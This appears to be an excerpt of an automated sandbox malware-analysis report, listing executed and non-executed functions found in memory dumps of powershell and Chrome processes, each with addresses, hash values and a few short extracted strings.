                                                                                                                    • Instruction ID: 90912d9900f3c4d37e83cd44ff8b6204eb1db6b495e6983a528eb21a94ab1600
                                                                                                                    • Opcode Fuzzy Hash: a88a81f58cbc33c3b7f411ace3cbe5e1ae5b0bdbf3c2b7d083a85f37b33b567c
                                                                                                                    • Instruction Fuzzy Hash: 5F51D732B0CA864FE79AEA2C64515B4B7E2EF55330BA911BAC04EC76A2DF14E8058351
                                                                                                                    Function 00007FF7C1514370 Relevance: .1, Instructions: 149COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1794067032.00007FF7C1510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1510000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ff7c1510000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e2a508c43da624b2a526482229df14af3c905df999d6c774fcef5d07a217910a
                                                                                                                    • Instruction ID: abb222c3d59ddaaaeb94d82bd7e441e0dafa47017d69a96c09a614603d379153
                                                                                                                    • Opcode Fuzzy Hash: e2a508c43da624b2a526482229df14af3c905df999d6c774fcef5d07a217910a
                                                                                                                    • Instruction Fuzzy Hash: 2B412932E0DA894FE7A6EF2C74506B8F7D1EF45730BA911BAC04EC7193EA54AC418391
                                                                                                                    Function 00007FF7C1449738 Relevance: .1, Instructions: 136COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1792925517.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ff7c1440000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4db9660fd9f3d40441182a7a592539fe12dfe06cce2ffa3271ba7d0f273064ca
                                                                                                                    • Instruction ID: 76ea59a70c830cc3ece7e9b14d6a0350f8b06d8f9a84a063a40fda38559dbad3
                                                                                                                    • Opcode Fuzzy Hash: 4db9660fd9f3d40441182a7a592539fe12dfe06cce2ffa3271ba7d0f273064ca
                                                                                                                    • Instruction Fuzzy Hash: 82310B3191CA489FDB5CAF5CE84A6BDBBE0FB99310F40413FE049C3252DA64A8158BC2
                                                                                                                    Function 00007FF7C144975E Relevance: .1, Instructions: 129COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1792925517.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ff7c1440000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9a06b6c72fa1366f14034117426919632758a0a77b4079cbbd0f3637d7b4a805
                                                                                                                    • Instruction ID: 1dff1c23187070fbb93c79dd9d3c85fde0a39667276b471839e59f3a33a04bbd
                                                                                                                    • Opcode Fuzzy Hash: 9a06b6c72fa1366f14034117426919632758a0a77b4079cbbd0f3637d7b4a805
                                                                                                                    • Instruction Fuzzy Hash: 7731F83191CA489FDB1CAF5CE80A6BDBBE1FB99711F00417FE049D3252DA70A9158BC2
                                                                                                                    Function 00007FF7C132ED40 Relevance: .1, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1791486712.00007FF7C132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C132D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ff7c132d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3b07295b121de821ab042a53062bbc82c2b7181c56f94811eeab76b73d636d59
                                                                                                                    • Instruction ID: 9a0795d55667491ef712e1704fba4ab216d94d28aeb011bd2d810c62c4330b28
                                                                                                                    • Opcode Fuzzy Hash: 3b07295b121de821ab042a53062bbc82c2b7181c56f94811eeab76b73d636d59
                                                                                                                    • Instruction Fuzzy Hash: 7341063140DBC44FE756AB2CA8529527FF0EF57224B1506EFD088CB1A3D625A846C7A2
                                                                                                                    Function 00007FF7C144A47C Relevance: .1, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1792925517.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ff7c1440000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 15aa725875f8379cfe08eb8018e1e793085942a12841393df9c3ee99ff953a45
                                                                                                                    • Instruction ID: 5f0328acc676a6debb804689c5059d9529540299b6da893e74169b7a4bb88c07
                                                                                                                    • Opcode Fuzzy Hash: 15aa725875f8379cfe08eb8018e1e793085942a12841393df9c3ee99ff953a45
                                                                                                                    • Instruction Fuzzy Hash: 2A21063190CB4C8FDB59DF6C984A7E9BFE0EB96331F04416BD449C3192DA74A416CB92
                                                                                                                    Function 00007FF7C15140BF Relevance: .1, Instructions: 98COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1794067032.00007FF7C1510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1510000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ff7c1510000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 355147b8060f3884f40f9346bbee96e38217d0ee730888878891f2bc8602cf3a
                                                                                                                    • Instruction ID: f342e22e1bc47b59996348c16cccad70f2241fd2b26dfdd36c9d701961068829
                                                                                                                    • Opcode Fuzzy Hash: 355147b8060f3884f40f9346bbee96e38217d0ee730888878891f2bc8602cf3a
                                                                                                                    • Instruction Fuzzy Hash: 9621D132E4D9874FE7A6EF296450174A7D2EF54330BAA11B9C04FCB5A2CF28EC048351
                                                                                                                    Function 00007FF7C144A065 Relevance: .1, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1792925517.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ff7c1440000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 29f8d715aef0ed12020aa9c96a2df20e5a908b2aa751d36f322fef923fd71e53
                                                                                                                    • Instruction ID: b09e06fc6549ccabb243acbd5589cdaaeb001e11a5fe06f63ac69f73680e8b14
                                                                                                                    • Opcode Fuzzy Hash: 29f8d715aef0ed12020aa9c96a2df20e5a908b2aa751d36f322fef923fd71e53
                                                                                                                    • Instruction Fuzzy Hash: 6C2168F69089918FC701AF2C9C551D9BB60FF22326F1442B7D0A98B1E3DF7066258BD2
                                                                                                                    Function 00007FF7C15143BC Relevance: .1, Instructions: 65COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1794067032.00007FF7C1510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1510000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ff7c1510000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 50cdf054bf6c3095d7317a12bc4b2e4259bc837d3e4ec7ca026960453e3c9d38
                                                                                                                    • Instruction ID: b72c744501f960cd28ef30716f047a6255115753e3931d9be40109b4aa8d0168
                                                                                                                    • Opcode Fuzzy Hash: 50cdf054bf6c3095d7317a12bc4b2e4259bc837d3e4ec7ca026960453e3c9d38
                                                                                                                    • Instruction Fuzzy Hash: 9C11E732D0D5854FE7A6EF2864545B8F7D1EF443307AA10BAC04EC75A2DB94AC408351
                                                                                                                    Function 00007FF7C14433B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1792925517.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ff7c1440000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                    • Instruction ID: c54b69891657694dda353fc0010de74ef287e9e7fb1097bd9f3af1f3cf9f17db
                                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                    • Instruction Fuzzy Hash: BA01677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056EE58AC3661DA36E892CB45

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FF7C1448BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1792925517.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ff7c1440000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: L_^4$L_^7$L_^F$L_^J
                                                                                                                    • API String ID: 0-3225005683
                                                                                                                    • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                                                                    • Instruction ID: bef83125966de9e06c503334940bd13b21d834a66fd8b99228bd42f8c9cfc198
                                                                                                                    • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                                                                    • Instruction Fuzzy Hash: C021F9B77085255FD3017BBDBC097ED7780CF9A37534551B2D2A98B253EA1470868AD0

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF7C150660A Relevance: 1.7, Strings: 1, Instructions: 440COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2032359223.00007FF7C1500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1500000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7ff7c1500000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: X7<
                                                                                                                    • API String ID: 0-2080639902
                                                                                                                    • Opcode ID: 2710e7bc9f70393e690803cc3fd965517c5874072f99693ed7b493c4fd88e33e
                                                                                                                    • Instruction ID: a25afbe8cb1f7c5acc5dcf7a8b3c7dd62551128dde9f0461a00e36affa655da0
                                                                                                                    • Opcode Fuzzy Hash: 2710e7bc9f70393e690803cc3fd965517c5874072f99693ed7b493c4fd88e33e
                                                                                                                    • Instruction Fuzzy Hash: 4BD15871A0DA8A4FEB55AF6858155B9FBE1FF06360B4801FED04DC71E3EA58AC06C361
                                                                                                                    Function 00007FF7C1439750 Relevance: .1, Instructions: 145COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2026692817.00007FF7C1435000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1435000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7ff7c1435000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0f8fe7d3d63058f537b00cabf9dbda8d1545bb16b7d8021039c3f251d47594f5
                                                                                                                    • Instruction ID: d8706dc32430e84b18a1fb5b5e7927630fa6dcc784aebd955043464c7c6213e0
                                                                                                                    • Opcode Fuzzy Hash: 0f8fe7d3d63058f537b00cabf9dbda8d1545bb16b7d8021039c3f251d47594f5
                                                                                                                    • Instruction Fuzzy Hash: 3241093190CB888FD719DF1CAC0A6A9BFE1FB56720F44426FD04983292CA74A915CBC6
                                                                                                                    Function 00007FF7C131F360 Relevance: .1, Instructions: 126COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2024744480.00007FF7C131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C131D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7ff7c131d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c61fa30a944edd6ba7dd3d25b86bcab1967164623575f827e348c86e7c3458bf
                                                                                                                    • Instruction ID: 1e1b6b3d633585474de1d5c177ee4d87409b7b07126f1930268cb03157eb0339
                                                                                                                    • Opcode Fuzzy Hash: c61fa30a944edd6ba7dd3d25b86bcab1967164623575f827e348c86e7c3458bf
                                                                                                                    • Instruction Fuzzy Hash: F241253040DBC04FE75A9B39DC41A527FB0EF46224B1606EFD088CB1A3D624A84AC7A2
                                                                                                                    Function 00007FF7C143A49C Relevance: .1, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2026692817.00007FF7C1435000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1435000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7ff7c1435000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9715e1cc9efee3bc8e0a275e8d52b0ed076ad097c2f4b5acd981ec4c6925e95c
                                                                                                                    • Instruction ID: 3d1606802b11221dd3eda59170ea29fbbf858f101f5d9f5d9488f7513fd71feb
                                                                                                                    • Opcode Fuzzy Hash: 9715e1cc9efee3bc8e0a275e8d52b0ed076ad097c2f4b5acd981ec4c6925e95c
                                                                                                                    • Instruction Fuzzy Hash: 8F31F771A0C74C8FEB58DF5CA84A6E9BBE0EB96331F04426BD049C3152DA71A41ACB91
                                                                                                                    Function 00007FF7C14333B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2026692817.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7ff7c1430000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                    • Instruction ID: 3c51e4c4f3955faf83e41b9041cfc47b18711a59c176f735775c2e75df53298d
                                                                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                    • Instruction Fuzzy Hash: 9701677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056EE58AC3661DA36E892CB45
                                                                                                                    Function 00007FF7C143A0FB Relevance: .0, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2026692817.00007FF7C1435000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1435000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7ff7c1435000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a92de324441fe18d2837eab87df70f27ea667d4bbce570d93fc89769a4035187
                                                                                                                    • Instruction ID: 7458d1544500fadf29b296f2cbdafa951a4ace28a31419c5c6ccaae5d43c0518
                                                                                                                    • Opcode Fuzzy Hash: a92de324441fe18d2837eab87df70f27ea667d4bbce570d93fc89769a4035187
                                                                                                                    • Instruction Fuzzy Hash: 31F02B76548A8C4FDB41EF2CA8590E4BF90FF6621174402FBD448C7162EB614908C7C1
                                                                                                                    Function 00007FF7C150414D Relevance: .0, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2032359223.00007FF7C1500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1500000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7ff7c1500000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9c70ff22f6c6a896507f8be71ea0f03e30bbd32e7924af1eb6414de8af2bcc19
                                                                                                                    • Instruction ID: 5648a4789ec9e76c469ce35c0ef74e3888408d6be07370b790fb68ae530f7f98
                                                                                                                    • Opcode Fuzzy Hash: 9c70ff22f6c6a896507f8be71ea0f03e30bbd32e7924af1eb6414de8af2bcc19
                                                                                                                    • Instruction Fuzzy Hash: 21F0BE32A0C9448FD758EB5CF4008A8B7E0EF5433075100BAE05DC71A3DA25EC808751
                                                                                                                    Function 00007FF7C1504400 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2032359223.00007FF7C1500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1500000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7ff7c1500000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 90ee5ac6e89a7d7bace48b68f2580cdaa899789af6185effe7badce2ccdbcbbc
                                                                                                                    • Instruction ID: 49c2028cb8b77db41ddeb8f2bf2e27555b2ffcca25b12400b7dfeaa7ce916a51
                                                                                                                    • Opcode Fuzzy Hash: 90ee5ac6e89a7d7bace48b68f2580cdaa899789af6185effe7badce2ccdbcbbc
                                                                                                                    • Instruction Fuzzy Hash: 03F05E32A0C5448FD754EB5CF4418A8B7E0FF4532179600B6E159CB563DA65AC448761
                                                                                                                    Function 00007FF7C15041D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2032359223.00007FF7C1500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1500000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7ff7c1500000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                    • Instruction ID: e8ba8d6ff0fd23551cd572cec685e8300c0d42024ddc764a0d017d61c00125c4
                                                                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                    • Instruction Fuzzy Hash: 0BE01A31B0C8089FDB68EE4CF0409A9B3E1EB9833179101BBD14EC7571DA22EC518B90

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FF7C1438BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2026692817.00007FF7C1435000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1435000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7ff7c1435000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                                                                    • API String ID: 0-962139525
                                                                                                                    • Opcode ID: b260b10dca75ad829fffd06b38cce263ed1d75634052bcd1b6c8a74d1e912534
                                                                                                                    • Instruction ID: 8cf7ccbb878e7b045ccd28b96b6317aa984029743ee9b46e3b9edad138417fe4
                                                                                                                    • Opcode Fuzzy Hash: b260b10dca75ad829fffd06b38cce263ed1d75634052bcd1b6c8a74d1e912534
                                                                                                                    • Instruction Fuzzy Hash: A321C5B36445158AD301366CBC45BD8B7C0DF5A3B938603F3E029CF2A3E918B4878A81
                                                                                                                    Function 00007FF7C14385FA Relevance: 5.1, Strings: 4, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2026692817.00007FF7C1435000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1435000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7ff7c1435000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M_^$M_^$M_^$M_^
                                                                                                                    • API String ID: 0-2235110077
                                                                                                                    • Opcode ID: 1f9178a419652c665ab67e1fad1d0dfbaa3608239ebe7c79b5de520bc48886f7
                                                                                                                    • Instruction ID: 68182ad574d32054444751c87395cbe925f16de0929050e2cc468c504e50da56
                                                                                                                    • Opcode Fuzzy Hash: 1f9178a419652c665ab67e1fad1d0dfbaa3608239ebe7c79b5de520bc48886f7
                                                                                                                    • Instruction Fuzzy Hash: C53182A294E3D59FD3036B252CA91D1BFA0AF2726979E01F7C0D58B1E3FC981406D326

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF7C14416A9 Relevance: .8, Instructions: 769COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2122180243.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ff7c1440000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4057d4265020e6c7685c05288ae3ce586bf9fe3ab2fad1b37b32edb4663c6cb6
                                                                                                                    • Instruction ID: 54f48630d7b0849c83bf2b8b111bb899ee014613f98ae6f62535d149aff044c9
                                                                                                                    • Opcode Fuzzy Hash: 4057d4265020e6c7685c05288ae3ce586bf9fe3ab2fad1b37b32edb4663c6cb6
                                                                                                                    • Instruction Fuzzy Hash: B0329070B18A098BE798FB2888696BDB7D2FF99751F84057DD00EC33D6DE68B8418741
                                                                                                                    Function 00007FF7C1442029 Relevance: .2, Instructions: 202COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2122180243.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ff7c1440000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b6bc31b7341a09bf0caecf0dab5b28fa7c62d39cfd449d6de41538f97aea6b8c
                                                                                                                    • Instruction ID: 692656c7a9b6e43d731c03a4759cfe04ad983fe4e73625dc170d8b266ddbbae5
                                                                                                                    • Opcode Fuzzy Hash: b6bc31b7341a09bf0caecf0dab5b28fa7c62d39cfd449d6de41538f97aea6b8c
                                                                                                                    • Instruction Fuzzy Hash: 3C511360A1EAC54FD796AB3858646B6BFE5EF47225B0801FFE0CDC7193DD48580AC352
                                                                                                                    Function 00007FF7C1441258 Relevance: .5, Instructions: 472COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2122180243.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ff7c1440000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2b30fc9a8f639a97f6c9b960a82862851634288154fe811f27613dc80642193a
                                                                                                                    • Instruction ID: ef9bf87ade9b409ce5bcc5f3e828c34cbd85db38c3356190e8be64d27b4c575b
                                                                                                                    • Opcode Fuzzy Hash: 2b30fc9a8f639a97f6c9b960a82862851634288154fe811f27613dc80642193a
                                                                                                                    • Instruction Fuzzy Hash: C221A771A1868A8FD705AB38C8A51E9FB72FF49305F4541BAC04AD72D3CE34B9158791
                                                                                                                    Function 00007FF7C1440B2F Relevance: .2, Instructions: 160COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2122180243.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ff7c1440000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8b224a53d408bd45a5ce6f1fdb9d1ac04cd08e30b24ac766205e38dcd937b4b2
                                                                                                                    • Instruction ID: 75d77d6c7a0229019143dcf614eac25912d6451f96473a8aaf584244a23a4b11
                                                                                                                    • Opcode Fuzzy Hash: 8b224a53d408bd45a5ce6f1fdb9d1ac04cd08e30b24ac766205e38dcd937b4b2
                                                                                                                    • Instruction Fuzzy Hash: 4B41D435B09A1D9FDB44FF68D8656EDB3A1FF99362F90427AD009C7382CE34A5428790
                                                                                                                    Function 00007FF7C1440E69 Relevance: .2, Instructions: 153COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2122180243.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ff7c1440000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c7ce117e5b9df8d929588b2b2d4541d164255c1953f38daef334b22233459679
                                                                                                                    • Instruction ID: cc5faa61dd9a4f13ffceb19642c266e9f5ae6c6cab5dc7e6c19575d9506994f6
                                                                                                                    • Opcode Fuzzy Hash: c7ce117e5b9df8d929588b2b2d4541d164255c1953f38daef334b22233459679
                                                                                                                    • Instruction Fuzzy Hash: 4F412A31B1CA4A4FE755BB3C98562B977D2EF85321B4801BAD44DC7293ED58BC828741
                                                                                                                    Function 00007FF7C1440620 Relevance: .1, Instructions: 133COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2122180243.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ff7c1440000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e61881812c303d7e2cb51e66ab59d7cdc0a84575a681aca00d3b92645b8dce89
                                                                                                                    • Instruction ID: 67da4e92fc5e17d962dcae04a2fc1f73872990cc529c1ee75d3a81c0568c484c
                                                                                                                    • Opcode Fuzzy Hash: e61881812c303d7e2cb51e66ab59d7cdc0a84575a681aca00d3b92645b8dce89
                                                                                                                    • Instruction Fuzzy Hash: 8731EB60B1C9494FE798EB2C585A779B7D2FF98361F4405BEE00EC3293DD54AC458341
